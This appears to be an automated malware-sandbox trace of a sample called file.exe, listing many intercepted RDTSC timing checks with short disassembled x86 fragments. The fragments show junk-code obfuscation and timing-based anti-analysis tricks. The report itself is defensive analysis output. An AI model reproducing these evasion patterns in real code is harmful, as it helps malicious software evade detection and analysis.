                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90B475 second address: 90B47B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90B47B second address: 90B47F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90B47F second address: 90B48B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FFBC8B2DA96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90B48B second address: 90B4A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFBC91A3BE7h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90B4A6 second address: 90B4E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnc 00007FFBC8B2DA96h 0x00000010 jne 00007FFBC8B2DA96h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jno 00007FFBC8B2DA98h 0x00000023 jmp 00007FFBC8B2DA9Ch 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DB11 second address: 90DB17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DB17 second address: 90DB1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DB1B second address: 90DB2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DB2A second address: 90DB3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DA9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DB3B second address: 90DB45 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FFBC91A3BDCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DB45 second address: 791B46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007FFBC8B2DA9Fh 0x0000000f mov eax, dword ptr [eax] 0x00000011 jmp 00007FFBC8B2DAA6h 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a jo 00007FFBC8B2DAA3h 0x00000020 jmp 00007FFBC8B2DA9Dh 0x00000025 pop eax 0x00000026 jmp 00007FFBC8B2DA9Ah 0x0000002b push dword ptr [ebp+122D0595h] 0x00000031 mov dword ptr [ebp+122D30BCh], ecx 0x00000037 call dword ptr [ebp+122D1DD7h] 0x0000003d pushad 0x0000003e mov dword ptr [ebp+122D189Fh], edi 0x00000044 xor eax, eax 0x00000046 jmp 00007FFBC8B2DAA0h 0x0000004b mov edx, dword ptr [esp+28h] 0x0000004f mov dword ptr [ebp+122D189Fh], esi 0x00000055 mov dword ptr [ebp+122D39AAh], eax 0x0000005b jmp 00007FFBC8B2DA9Ch 0x00000060 jmp 00007FFBC8B2DAA7h 0x00000065 mov esi, 0000003Ch 0x0000006a jmp 00007FFBC8B2DAA9h 0x0000006f add esi, dword ptr [esp+24h] 0x00000073 jmp 00007FFBC8B2DAA6h 0x00000078 clc 0x00000079 lodsw 0x0000007b stc 0x0000007c add eax, dword ptr [esp+24h] 0x00000080 clc 0x00000081 mov ebx, dword ptr [esp+24h] 0x00000085 sub dword ptr [ebp+122D189Fh], edx 0x0000008b nop 0x0000008c push esi 0x0000008d push eax 0x0000008e push edx 0x0000008f pushad 0x00000090 popad 0x00000091 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DBE7 second address: 90DC3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC91A3BDDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007FFBC91A3BE7h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jp 00007FFBC91A3BE0h 0x0000001a mov eax, dword ptr [eax] 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FFBC91A3BE3h 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DC3C second address: 90DC65 instructions: 0x00000000 rdtsc 0x00000002 js 00007FFBC8B2DA98h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 jmp 00007FFBC8B2DAA5h 0x00000016 pop ecx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DC65 second address: 90DD08 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 and edi, dword ptr [ebp+122D37CEh] 0x0000000f add esi, dword ptr [ebp+122D3746h] 0x00000015 push 00000003h 0x00000017 mov edx, dword ptr [ebp+122D3826h] 0x0000001d push 00000000h 0x0000001f jmp 00007FFBC91A3BE6h 0x00000024 push 00000003h 0x00000026 mov edx, dword ptr [ebp+122D3A66h] 0x0000002c push 9506531Fh 0x00000031 je 00007FFBC91A3BEDh 0x00000037 push esi 0x00000038 jmp 00007FFBC91A3BE5h 0x0000003d pop esi 0x0000003e add dword ptr [esp], 2AF9ACE1h 0x00000045 mov edi, 0E020BDAh 0x0000004a lea ebx, dword ptr [ebp+1244FA57h] 0x00000050 push 00000000h 0x00000052 push ecx 0x00000053 call 00007FFBC91A3BD8h 0x00000058 pop ecx 0x00000059 mov dword ptr [esp+04h], ecx 0x0000005d add dword ptr [esp+04h], 0000001Dh 0x00000065 inc ecx 0x00000066 push ecx 0x00000067 ret 0x00000068 pop ecx 0x00000069 ret 0x0000006a mov edi, dword ptr [ebp+122D1F7Eh] 0x00000070 push eax 0x00000071 push eax 0x00000072 push edx 0x00000073 push eax 0x00000074 push edx 0x00000075 push eax 0x00000076 push edx 0x00000077 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DD08 second address: 90DD0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DD0C second address: 90DD16 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FFBC91A3BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DD16 second address: 90DD31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFBC8B2DAA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DDDA second address: 90DDDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DDDE second address: 90DE0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jl 00007FFBC8B2DA98h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FFBC8B2DA9Bh 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DE0F second address: 90DE24 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007FFBC91A3BD8h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DE24 second address: 90DE47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DE47 second address: 90DE58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ebx 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DE58 second address: 90DE5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DE5C second address: 90DEDC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC91A3BDEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007FFBC91A3BDCh 0x0000000f jnp 00007FFBC91A3BD6h 0x00000015 popad 0x00000016 pop eax 0x00000017 jmp 00007FFBC91A3BDBh 0x0000001c push 00000003h 0x0000001e mov edx, dword ptr [ebp+122D3956h] 0x00000024 mov di, si 0x00000027 push 00000000h 0x00000029 mov dword ptr [ebp+122D36A2h], edi 0x0000002f push 00000003h 0x00000031 call 00007FFBC91A3BE1h 0x00000036 je 00007FFBC91A3BEFh 0x0000003c jmp 00007FFBC91A3BE9h 0x00000041 pop edx 0x00000042 push 8F5C633Eh 0x00000047 push eax 0x00000048 push edx 0x00000049 push ebx 0x0000004a je 00007FFBC91A3BD6h 0x00000050 pop ebx 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DEDC second address: 90DEF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFBC8B2DAA9h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DEF9 second address: 90DF2D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FFBC91A3BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 4F5C633Eh 0x00000013 lea ebx, dword ptr [ebp+1244FA60h] 0x00000019 mov cl, ah 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FFBC91A3BE6h 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DFB2 second address: 90DFC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFBC8B2DAA2h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DFC8 second address: 90DFCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DFCC second address: 90DFF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b pushad 0x0000000c push ebx 0x0000000d clc 0x0000000e pop edi 0x0000000f mov dword ptr [ebp+122D2499h], ebx 0x00000015 popad 0x00000016 push 00000000h 0x00000018 sub edi, dword ptr [ebp+122D1FE8h] 0x0000001e push 4B40D591h 0x00000023 pushad 0x00000024 jl 00007FFBC8B2DA9Ch 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DFF8 second address: 90E06A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jo 00007FFBC91A3BD6h 0x0000000b jns 00007FFBC91A3BD6h 0x00000011 popad 0x00000012 popad 0x00000013 xor dword ptr [esp], 4B40D511h 0x0000001a sbb edx, 3EFCA9F4h 0x00000020 push 00000003h 0x00000022 mov dword ptr [ebp+122D24A8h], esi 0x00000028 push 00000000h 0x0000002a jmp 00007FFBC91A3BE4h 0x0000002f push 00000003h 0x00000031 push 00000000h 0x00000033 push ebx 0x00000034 call 00007FFBC91A3BD8h 0x00000039 pop ebx 0x0000003a mov dword ptr [esp+04h], ebx 0x0000003e add dword ptr [esp+04h], 00000018h 0x00000046 inc ebx 0x00000047 push ebx 0x00000048 ret 0x00000049 pop ebx 0x0000004a ret 0x0000004b xor cl, FFFFFFFAh 0x0000004e push E06D08B2h 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 ja 00007FFBC91A3BD6h 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90E06A second address: 90E087 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E5BA second address: 92E5BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E5BF second address: 92E5C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E5C7 second address: 92E5CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 902198 second address: 90219C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90219C second address: 9021A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92C4C9 second address: 92C4D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92C4D1 second address: 92C4D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92C4D5 second address: 92C4DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92CF1D second address: 92CF36 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FFBC91A3BDBh 0x0000000d ja 00007FFBC91A3BD6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92D0A7 second address: 92D0AC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92D0AC second address: 92D0BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jng 00007FFBC91A3BDEh 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92D213 second address: 92D236 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FFBC8B2DAA8h 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92D236 second address: 92D23A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92D23A second address: 92D25A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FFBC8B2DAA4h 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92D25A second address: 92D25E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92D3B0 second address: 92D3F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FFBC8B2DAA2h 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007FFBC8B2DAA6h 0x00000011 ja 00007FFBC8B2DA96h 0x00000017 jo 00007FFBC8B2DA96h 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92D3F0 second address: 92D3F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92D6B0 second address: 92D6DB instructions: 0x00000000 rdtsc 0x00000002 jc 00007FFBC8B2DA96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FFBC8B2DAA0h 0x00000010 jne 00007FFBC8B2DA96h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 popad 0x0000001a pushad 0x0000001b push ecx 0x0000001c push edi 0x0000001d pop edi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92DDEF second address: 92DDF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92DDF4 second address: 92DE17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFBC8B2DAA9h 0x00000009 jno 00007FFBC8B2DA96h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92DE17 second address: 92DE22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92DF40 second address: 92DF6F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007FFBC8B2DAA9h 0x0000000e pop ecx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 pop eax 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92DF6F second address: 92DF7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC91A3BDCh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E123 second address: 92E12D instructions: 0x00000000 rdtsc 0x00000002 jp 00007FFBC8B2DA96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E12D second address: 92E13B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FFBC91A3BD6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E13B second address: 92E14D instructions: 0x00000000 rdtsc 0x00000002 jno 00007FFBC8B2DA96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007FFBC8B2DAA2h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E14D second address: 92E15F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FFBC91A3BD6h 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007FFBC91A3BD6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9314AC second address: 9314E2 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FFBC8B2DAAFh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FFBC8B2DA9Ch 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 903CDC second address: 903CE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 933E94 second address: 933EA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FFBC8B2DA9Eh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F9CD6 second address: 8F9CF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFBC91A3BE9h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93B348 second address: 93B366 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA6h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93B366 second address: 93B36A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93B4C3 second address: 93B4C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93B4C8 second address: 93B4D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FFBC91A3BD6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93B4D4 second address: 93B4D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93B8E1 second address: 93B8F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFBC91A3BDDh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93B8F5 second address: 93B8FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93BACC second address: 93BAD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93BAD2 second address: 93BAD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93BAD6 second address: 93BADA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93BADA second address: 93BB12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FFBC8B2DAA8h 0x0000000b jmp 00007FFBC8B2DAA3h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 pop edi 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93BB12 second address: 93BB16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93BB16 second address: 93BB22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93BB22 second address: 93BB26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93BB26 second address: 93BB2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93BC74 second address: 93BC78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93C5EA second address: 93C5EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93C764 second address: 93C76D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93D65F second address: 93D666 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93D666 second address: 93D670 instructions: 0x00000000 rdtsc 0x00000002 js 00007FFBC91A3BDCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93D71F second address: 93D73E instructions: 0x00000000 rdtsc 0x00000002 jng 00007FFBC8B2DA96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jnp 00007FFBC8B2DA9Ch 0x00000013 mov dword ptr [ebp+122D32D9h], edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push edx 0x0000001e pop edx 0x0000001f rdtsc
